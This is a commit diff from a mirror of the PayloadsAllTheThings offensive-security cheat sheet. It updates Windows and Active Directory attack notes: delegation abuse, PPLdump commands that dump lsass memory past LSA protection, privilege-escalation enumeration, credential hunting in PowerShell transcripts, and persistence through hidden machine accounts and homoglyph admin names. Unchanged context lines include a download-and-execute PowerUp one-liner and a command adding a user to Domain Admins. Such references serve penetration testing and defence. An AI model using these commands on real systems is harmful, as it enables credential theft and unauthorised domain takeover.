mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2024-06-30 19:02:55 +00:00
PS Transcript + PPLdump.exe
This commit is contained in:
parent
28a48bd696
commit
a723a34449
@ -2153,10 +2153,10 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012.
|
|||||||
```ps1
|
```ps1
|
||||||
# alternative
|
# alternative
|
||||||
$SID_FROM_PREVIOUS_COMMAND = Get-DomainComputer MACHINE_ACCOUNT_NAME -Properties objectsid | Select -Expand objectsid
|
$SID_FROM_PREVIOUS_COMMAND = Get-DomainComputer MACHINE_ACCOUNT_NAME -Properties objectsid | Select -Expand objectsid
|
||||||
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$SID_FROM_PREVIOUS_COMMAND)"; $SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0); Get-DomainComputer M3DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
|
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$SID_FROM_PREVIOUS_COMMAND)"; $SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0); Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
|
||||||
|
|
||||||
# alternative
|
# alternative
|
||||||
StandIn_Net35.exe --computer m3dc --sid SID_FROM_PREVIOUS_COMMAND
|
StandIn_Net35.exe --computer dc01 --sid SID_FROM_PREVIOUS_COMMAND
|
||||||
```
|
```
|
||||||
|
|
||||||
5. Use Rubeus to get hash from password
|
5. Use Rubeus to get hash from password
|
||||||
|
@ -64,7 +64,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
|
|||||||
|
|
||||||
## Mimikatz - LSA Protection Workaround
|
## Mimikatz - LSA Protection Workaround
|
||||||
|
|
||||||
- LSA as a Protected Process
|
- LSA as a Protected Process (RunAsPPL)
|
||||||
```powershell
|
```powershell
|
||||||
# Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1
|
# Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1
|
||||||
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
|
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
|
||||||
@ -83,9 +83,15 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
|
|||||||
|
|
||||||
# Now lets re-add the protection flags to the lsass.exe process
|
# Now lets re-add the protection flags to the lsass.exe process
|
||||||
mimikatz # !processprotect /process:lsass.exe
|
mimikatz # !processprotect /process:lsass.exe
|
||||||
|
|
||||||
# Unload the service created
|
# Unload the service created
|
||||||
mimikatz # !-
|
mimikatz # !-
|
||||||
|
|
||||||
|
|
||||||
|
# https://github.com/itm4n/PPLdump
|
||||||
|
PPLdump.exe [-v] [-d] [-f] <PROC_NAME|PROC_ID> <DUMP_FILE>
|
||||||
|
PPLdump.exe lsass.exe lsass.dmp
|
||||||
|
PPLdump.exe -v 720 out.dmp
|
||||||
```
|
```
|
||||||
|
|
||||||
- LSA is running as virtualized process (LSAISO) by **Credential Guard**
|
- LSA is running as virtualized process (LSAISO) by **Credential Guard**
|
||||||
|
@ -21,7 +21,8 @@
|
|||||||
* [Wifi passwords](#wifi-passwords)
|
* [Wifi passwords](#wifi-passwords)
|
||||||
* [Sticky Notes passwords](#sticky-notes-passwords)
|
* [Sticky Notes passwords](#sticky-notes-passwords)
|
||||||
* [Passwords stored in services](#passwords-stored-in-services)
|
* [Passwords stored in services](#passwords-stored-in-services)
|
||||||
* [Powershell history](#powershell-history)
|
* [Powershell History](#powershell-history)
|
||||||
|
* [Powershell Transcript](#powershell-transcript)
|
||||||
* [Password in Alternate Data Stream](#password-in-alternate-data-stream)
|
* [Password in Alternate Data Stream](#password-in-alternate-data-stream)
|
||||||
* [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks)
|
* [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks)
|
||||||
* [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services)
|
* [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services)
|
||||||
@ -102,6 +103,7 @@
|
|||||||
```powershell
|
```powershell
|
||||||
C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
|
C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
|
||||||
C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"
|
C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"
|
||||||
|
C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Report PrivescCheck_%COMPUTERNAME% -Format TXT,CSV,HTML"
|
||||||
```
|
```
|
||||||
|
|
||||||
## Windows Version and Configuration
|
## Windows Version and Configuration
|
||||||
@ -537,7 +539,7 @@ Invoke-SessionGopher -AllDomain -o
|
|||||||
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
|
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
|
||||||
```
|
```
|
||||||
|
|
||||||
### Powershell history
|
### Powershell History
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
||||||
@ -547,6 +549,13 @@ cat (Get-PSReadlineOption).HistorySavePath
|
|||||||
cat (Get-PSReadlineOption).HistorySavePath | sls passw
|
cat (Get-PSReadlineOption).HistorySavePath | sls passw
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Powershell Transcript
|
||||||
|
|
||||||
|
```xml
|
||||||
|
C:\Users\<USERNAME>\Documents\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
|
||||||
|
C:\Transcripts\<DATE>\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
|
||||||
|
```
|
||||||
|
|
||||||
### Password in Alternate Data Stream
|
### Password in Alternate Data Stream
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
@ -556,62 +565,55 @@ PS > Get-Content -path flag.txt -Stream Flag
|
|||||||
|
|
||||||
## EoP - Processes Enumeration and Tasks
|
## EoP - Processes Enumeration and Tasks
|
||||||
|
|
||||||
What processes are running?
|
* What processes are running?
|
||||||
|
```powershell
|
||||||
|
tasklist /v
|
||||||
|
net start
|
||||||
|
sc query
|
||||||
|
Get-Service
|
||||||
|
Get-Process
|
||||||
|
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
|
||||||
|
```
|
||||||
|
|
||||||
```powershell
|
* Which processes are running as "system"
|
||||||
tasklist /v
|
```powershell
|
||||||
net start
|
tasklist /v /fi "username eq system"
|
||||||
sc query
|
```
|
||||||
Get-Service
|
|
||||||
Get-Process
|
|
||||||
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
|
|
||||||
```
|
|
||||||
|
|
||||||
Which processes are running as "system"
|
* Do you have powershell magic?
|
||||||
|
```powershell
|
||||||
|
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
|
||||||
|
```
|
||||||
|
|
||||||
```powershell
|
* List installed programs
|
||||||
tasklist /v /fi "username eq system"
|
```powershell
|
||||||
```
|
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
|
||||||
|
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
|
||||||
|
```
|
||||||
|
|
||||||
Do you have powershell magic?
|
* List services
|
||||||
|
```powershell
|
||||||
|
net start
|
||||||
|
wmic service list brief
|
||||||
|
tasklist /SVC
|
||||||
|
```
|
||||||
|
|
||||||
```powershell
|
* Enumerate scheduled tasks
|
||||||
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
|
```powershell
|
||||||
```
|
schtasks /query /fo LIST 2>nul | findstr TaskName
|
||||||
|
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
|
||||||
|
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
|
||||||
|
```
|
||||||
|
|
||||||
List installed programs
|
* Startup tasks
|
||||||
|
```powershell
|
||||||
```powershell
|
wmic startup get caption,command
|
||||||
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
|
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
|
||||||
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
|
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
|
||||||
```
|
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
|
||||||
|
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
|
||||||
List services
|
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
|
||||||
|
```
|
||||||
```powershell
|
|
||||||
net start
|
|
||||||
wmic service list brief
|
|
||||||
tasklist /SVC
|
|
||||||
```
|
|
||||||
|
|
||||||
Scheduled tasks
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
schtasks /query /fo LIST 2>nul | findstr TaskName
|
|
||||||
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
|
|
||||||
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
|
|
||||||
```
|
|
||||||
|
|
||||||
Startup tasks
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
wmic startup get caption,command
|
|
||||||
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
|
|
||||||
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
|
|
||||||
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
|
|
||||||
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
|
|
||||||
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
|
|
||||||
```
|
|
||||||
|
|
||||||
## EoP - Incorrect permissions in services
|
## EoP - Incorrect permissions in services
|
||||||
|
|
||||||
@ -641,17 +643,16 @@ Often, services are pointing to writeable locations:
|
|||||||
```
|
```
|
||||||
|
|
||||||
- PATH directories with weak permissions
|
- PATH directories with weak permissions
|
||||||
|
```powershell
|
||||||
|
$ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
|
||||||
|
$ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
|
||||||
|
|
||||||
```powershell
|
$ sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt
|
||||||
$ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
|
FOR /F %i in (Servicenames.txt) DO echo %i
|
||||||
$ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
|
type Servicenames.txt
|
||||||
|
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
|
||||||
$ sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt
|
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
|
||||||
FOR /F %i in (Servicenames.txt) DO echo %i
|
```
|
||||||
type Servicenames.txt
|
|
||||||
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
|
|
||||||
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
|
|
||||||
```
|
|
||||||
|
|
||||||
Alternatively you can use the Metasploit exploit : `exploit/windows/local/service_permissions`
|
Alternatively you can use the Metasploit exploit : `exploit/windows/local/service_permissions`
|
||||||
|
|
||||||
@ -769,7 +770,6 @@ gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Whe
|
|||||||
|
|
||||||
* Metasploit exploit : `exploit/windows/local/trusted_service_path`
|
* Metasploit exploit : `exploit/windows/local/trusted_service_path`
|
||||||
* PowerUp exploit
|
* PowerUp exploit
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# find the vulnerable application
|
# find the vulnerable application
|
||||||
C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks"
|
C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks"
|
||||||
@ -832,7 +832,7 @@ Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c
|
|||||||
|
|
||||||
Check if these registry values are set to "1".
|
Check if these registry values are set to "1".
|
||||||
|
|
||||||
```bat
|
```powershell
|
||||||
$ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
$ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||||
$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||||
|
|
||||||
|
@ -36,10 +36,18 @@ net group "Domain Admins" hacker /add /domain
|
|||||||
|
|
||||||
# enable a domain user account
|
# enable a domain user account
|
||||||
net user hacker /ACTIVE:YES /domain
|
net user hacker /ACTIVE:YES /domain
|
||||||
|
|
||||||
# prevent users from changing their password
|
# prevent users from changing their password
|
||||||
net user username /Passwordchg:No
|
net user username /Passwordchg:No
|
||||||
|
|
||||||
# prevent the password to expire
|
# prevent the password to expire
|
||||||
net user hacker /Expires:Never
|
net user hacker /Expires:Never
|
||||||
|
|
||||||
|
# create a machine account (not shown in net users)
|
||||||
|
net user /add evilbob$ evilpassword
|
||||||
|
|
||||||
|
# homoglyph Aԁmіnistratοr (different of Administrator)
|
||||||
|
Aԁmіnistratοr
|
||||||
```
|
```
|
||||||
|
|
||||||
Some info about your user
|
Some info about your user
|
||||||
|
Loading…
Reference in New Issue
Block a user